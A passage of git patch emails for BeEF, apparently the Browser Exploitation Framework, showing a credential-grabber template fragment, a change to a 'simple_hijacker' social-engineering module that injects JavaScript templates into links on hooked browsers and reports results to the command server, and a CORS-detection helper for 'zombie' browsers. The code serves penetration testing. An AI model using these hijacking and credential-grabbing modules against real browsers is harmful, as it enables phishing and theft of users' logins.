'; + credgrabber = setInterval(checker,1000); + + } + + writeit(); From 716e7fe712ba6868d2df56d88e7e2bba441a8948 Mon Sep 17 00:00:00 2001 From: Jean-Louis Huynen Date: Wed, 5 Sep 2012 15:15:56 +0200 Subject: [PATCH 7/8] Change stupid code that made this module unusable with the API to something less stupid (i hope) --- modules/social_engineering/simple_hijacker/command.js | 8 +++++++- modules/social_engineering/simple_hijacker/module.rb | 2 -- 2 files changed, 7 insertions(+), 3 deletions(-) diff --git a/modules/social_engineering/simple_hijacker/command.js b/modules/social_engineering/simple_hijacker/command.js index adcc3e4b2..e924ebb41 100644 --- a/modules/social_engineering/simple_hijacker/command.js +++ b/modules/social_engineering/simple_hijacker/command.js @@ -24,7 +24,13 @@ hijack = function(){ if ($j(this).attr('href') != '') { if( <% target.each{ |href| %> $j(this).attr('href').indexOf("<%=href%>") != -1 <% if href != target.last %> || <% else %> ) <% end %><% } %>{ - <%= instance_variable_get("@#{@choosetmpl}") %> + <% + tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{@choosetmpl}.js" + file = File.open(tplpath, "r") + @template = file.read + %> + + <%= @template %> beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Template "<%= @choosetmpl %>" applied to '+$j(this).attr('href')); } } diff --git a/modules/social_engineering/simple_hijacker/module.rb b/modules/social_engineering/simple_hijacker/module.rb index d9a66c1dd..6a40a85ed 100644 --- a/modules/social_engineering/simple_hijacker/module.rb +++ b/modules/social_engineering/simple_hijacker/module.rb @@ -29,8 +29,6 @@ class Simple_hijacker < BeEF::Core::Command @templates.each{ |template| tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{template}.js" raise "Invalid template path for command template #{template}" if not File.exists?(tplpath) - file = File.open(tplpath, "r") - data.push({'name' => template, 'type' => 'hidden', 'value' => file.read}) tmptpl<<[ template] } From 085f2775f37e81e62e4448e4a45ab4020baacf9d Mon Sep 17 00:00:00 2001 From: bcoles Date: Thu, 6 Sep 2012 17:50:27 +0930 Subject: [PATCH 8/8] Added `beef.browser.hasCors()` function --- core/main/client/browser.js | 19 +++++++++++++++++-- 1 file changed, 17 insertions(+), 2 deletions(-) diff --git a/core/main/client/browser.js b/core/main/client/browser.js index 42bfcaca0..519285a08 100644 --- a/core/main/client/browser.js +++ b/core/main/client/browser.js @@ -605,8 +605,8 @@ beef.browser = { * Checks if the Phonegap API is available from the hooked domain. * @return: {Boolean} true or false. * - * @example: if(beef.browser.hasJava()) { ... } - */ + * @example: if(beef.browser.hasPhonegap()) { ... } + */ hasPhonegap: function() { var result = false; try { if (!!device.phonegap) result = true; else result = false; } @@ -614,6 +614,21 @@ beef.browser = { return result; }, + /** + * Checks if the browser supports CORS + * @return: {Boolean} true or false. + * + * @example: if(beef.browser.hasCors()) { ... } + */ + hasCors: function() { + if ('withCredentials' in new XMLHttpRequest()) + return true; + else if (typeof XDomainRequest !== "undefined") + return true; + else + return false; + }, + /** * Checks if the zombie has Java installed and enabled. * @return: {Boolean} true or false.